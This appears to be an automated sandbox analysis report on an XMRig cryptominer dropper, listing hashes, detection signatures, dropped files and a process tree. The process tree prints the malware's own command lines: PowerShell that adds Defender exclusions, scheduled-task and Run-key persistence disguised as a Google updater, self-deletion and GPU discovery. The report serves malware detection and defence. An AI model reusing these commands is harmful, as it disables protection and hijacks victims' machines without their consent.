Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...y8.exe
windows10-2004-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...SE.exe
windows10-2004-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...CD.exe
windows10-2004-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...Da.exe
windows10-2004-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...wq.exe
windows10-2004-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...r7.exe
windows10-2004-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows10-2004-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...eg.exe
windows10-2004-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...5H.exe
windows10-2004-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...XN.exe
windows10-2004-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...T3.exe
windows10-2004-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...9r.exe
windows10-2004-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...GR.exe
windows10-2004-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EX.exe
windows10-2004-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...EA.exe
windows10-2004-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...FB.exe
windows10-2004-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
446s -
max time network
1788s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
23-01-2024 19:27
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231129-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231129-en
Behavioral task
behavioral30
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral31
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231215-en
General
-
Target
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
Processes:
Q5EUCWHU7pMYBfT3.exeupdater.execonhost.exedescription pid process target process PID 2516 created 1140 2516 Q5EUCWHU7pMYBfT3.exe Explorer.EXE PID 2516 created 1140 2516 Q5EUCWHU7pMYBfT3.exe Explorer.EXE PID 2516 created 1140 2516 Q5EUCWHU7pMYBfT3.exe Explorer.EXE PID 2516 created 1140 2516 Q5EUCWHU7pMYBfT3.exe Explorer.EXE PID 2944 created 1140 2944 updater.exe Explorer.EXE PID 2944 created 1140 2944 updater.exe Explorer.EXE PID 2944 created 1140 2944 updater.exe Explorer.EXE PID 2944 created 1140 2944 updater.exe Explorer.EXE PID 796 created 1140 796 conhost.exe Explorer.EXE PID 2944 created 1140 2944 updater.exe Explorer.EXE -
XMRig Miner payload 29 IoCs
Processes:
resource yara_rule behavioral21/memory/828-72-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-74-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-78-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-80-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-82-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-84-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-86-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-88-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-90-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-92-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-94-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-96-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-98-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-100-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-102-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-104-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-106-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-108-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-110-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-112-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-114-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-116-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-118-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-120-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-122-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-124-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-126-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-128-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/828-130-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2544 cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 2944 updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 2880 taskeng.exe -
Processes:
resource yara_rule behavioral21/memory/828-68-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-72-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-74-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-78-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-80-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-82-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-84-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-86-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-88-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-90-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-92-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-94-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-96-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-98-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-100-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-102-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-104-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-106-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-108-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-110-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-112-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-114-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-116-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-118-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-120-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-122-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-124-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-126-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-128-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/828-130-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 2944 set thread context of 796 2944 updater.exe conhost.exe PID 2944 set thread context of 828 2944 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
cmd.execmd.exeQ5EUCWHU7pMYBfT3.exeupdater.exedescription ioc process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe Q5EUCWHU7pMYBfT3.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2816 schtasks.exe 2900 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 3 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 508082e5b94fda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
Q5EUCWHU7pMYBfT3.exepowershell.exepowershell.exepowershell.exeupdater.exepowershell.exepowershell.execonhost.exepid process 2516 Q5EUCWHU7pMYBfT3.exe 2516 Q5EUCWHU7pMYBfT3.exe 2312 powershell.exe 2516 Q5EUCWHU7pMYBfT3.exe 2516 Q5EUCWHU7pMYBfT3.exe 2684 powershell.exe 2516 Q5EUCWHU7pMYBfT3.exe 2516 Q5EUCWHU7pMYBfT3.exe 2516 Q5EUCWHU7pMYBfT3.exe 2516 Q5EUCWHU7pMYBfT3.exe 2548 powershell.exe 2944 updater.exe 2944 updater.exe 352 powershell.exe 2944 updater.exe 2944 updater.exe 2116 powershell.exe 2944 updater.exe 2944 updater.exe 2944 updater.exe 2944 updater.exe 796 conhost.exe 796 conhost.exe 2944 updater.exe 2944 updater.exe -
Suspicious use of AdjustPrivilegeToken 31 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeupdater.exeWMIC.execonhost.exedescription pid process Token: SeDebugPrivilege 2312 powershell.exe Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 352 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 2944 updater.exe Token: SeAssignPrimaryTokenPrivilege 1240 WMIC.exe Token: SeIncreaseQuotaPrivilege 1240 WMIC.exe Token: SeSecurityPrivilege 1240 WMIC.exe Token: SeTakeOwnershipPrivilege 1240 WMIC.exe Token: SeLoadDriverPrivilege 1240 WMIC.exe Token: SeSystemtimePrivilege 1240 WMIC.exe Token: SeBackupPrivilege 1240 WMIC.exe Token: SeRestorePrivilege 1240 WMIC.exe Token: SeShutdownPrivilege 1240 WMIC.exe Token: SeSystemEnvironmentPrivilege 1240 WMIC.exe Token: SeUndockPrivilege 1240 WMIC.exe Token: SeManageVolumePrivilege 1240 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1240 WMIC.exe Token: SeIncreaseQuotaPrivilege 1240 WMIC.exe Token: SeSecurityPrivilege 1240 WMIC.exe Token: SeTakeOwnershipPrivilege 1240 WMIC.exe Token: SeLoadDriverPrivilege 1240 WMIC.exe Token: SeSystemtimePrivilege 1240 WMIC.exe Token: SeBackupPrivilege 1240 WMIC.exe Token: SeRestorePrivilege 1240 WMIC.exe Token: SeShutdownPrivilege 1240 WMIC.exe Token: SeSystemEnvironmentPrivilege 1240 WMIC.exe Token: SeUndockPrivilege 1240 WMIC.exe Token: SeManageVolumePrivilege 1240 WMIC.exe Token: SeLockMemoryPrivilege 828 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
powershell.execmd.exepowershell.exetaskeng.exepowershell.exeupdater.execmd.exedescription pid process target process PID 2684 wrote to memory of 2816 2684 powershell.exe schtasks.exe PID 2684 wrote to memory of 2816 2684 powershell.exe schtasks.exe PID 2684 wrote to memory of 2816 2684 powershell.exe schtasks.exe PID 2544 wrote to memory of 2628 2544 cmd.exe choice.exe PID 2544 wrote to memory of 2628 2544 cmd.exe choice.exe PID 2544 wrote to memory of 2628 2544 cmd.exe choice.exe PID 2548 wrote to memory of 2436 2548 powershell.exe schtasks.exe PID 2548 wrote to memory of 2436 2548 powershell.exe schtasks.exe PID 2548 wrote to memory of 2436 2548 powershell.exe schtasks.exe PID 2880 wrote to memory of 2944 2880 taskeng.exe updater.exe PID 2880 wrote to memory of 2944 2880 taskeng.exe updater.exe PID 2880 wrote to memory of 2944 2880 taskeng.exe updater.exe PID 2116 wrote to memory of 2900 2116 powershell.exe schtasks.exe PID 2116 wrote to memory of 2900 2116 powershell.exe schtasks.exe PID 2116 wrote to memory of 2900 2116 powershell.exe schtasks.exe PID 2944 wrote to memory of 796 2944 updater.exe conhost.exe PID 1460 wrote to memory of 1240 1460 cmd.exe WMIC.exe PID 1460 wrote to memory of 1240 1460 cmd.exe WMIC.exe PID 1460 wrote to memory of 1240 1460 cmd.exe WMIC.exe PID 2944 wrote to memory of 828 2944 updater.exe conhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Q5EUCWHU7pMYBfT3.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Q5EUCWHU7pMYBfT3.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2516
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2312 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Q5EUCWHU7pMYBfT3.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:352 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2900 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:828 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1456 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:796
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"1⤵
- Creates scheduled task(s)
PID:2816
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC1⤵PID:2436
-
C:\Windows\system32\taskeng.exetaskeng.exe {34967AAD-ACAF-49DE-845F-309512E1773A} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵PID:2628
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1240
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
171KB
MD5c71010f762d9610f5e4b1b1cfb733131
SHA1aecbe258b20807fe2732411ac77cbad188d98b9e
SHA2564ea6e7509a70054878966d2c08c42e84cafc352139e25487486f08ca6c2b230f
SHA5123c004c0274db931d295aa8fd78feb96f20bf5a90aab4dab46ff8b58f02342f62d2b8155d349ede348f4ffb251dd74761831e6244338c7a3b04a9e2d954ec1516
-
Filesize
302KB
MD5b4d4231f8f04182242f665f20dcdb534
SHA10e300aacb0dd8fe0809c2d69e1618c0d4de25198
SHA2569131328c6ece1a1d60e48ba2eca03f1f5b900a8f184856dc520b8f367c1057ad
SHA5121dd34a3352cd21bcf89173857ee8b48504b072aafcc4610fbb3ca11e5dfcdfe2d67ac071bebae7c65b7e2deb74288e524b8402be4b80328b2cbf34e773c0577f
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E2KDIJ2E3643D03963LV.temp
Filesize7KB
MD5fafb9428fe4af10edf7a2214d150132a
SHA19cb42cdc6b7c4ac8b1185fda9c11685cf41e90a7
SHA256d15a8f2db768458e1a593f8166ce58f9667ad260248148a53f9a0ecd8cb05372
SHA512145094c7a3de7f07f090067d4fe0d1424b8991f8a94378b650086e3f114b1cf414227ed9d24fa17a73b0d25262a89ed71ac329c3cdc13015add6011104cf2362
-
Filesize
237KB
MD52cc47fe0d8205d032194eeda270d3634
SHA17707459a8f92fda0afd86dd50608b8365bd259be
SHA2567c8404b190c3d06882f2d7525170ecb665e83233086f6d877966280cce6a1c84
SHA512017f85beff791c022bdc5d29fac4c85c277117fe094973390df914eaf62541bed385af9046a47d7032a762ecf8e0a7390ac3ce8b3db5fdd737411909fbf2d2fd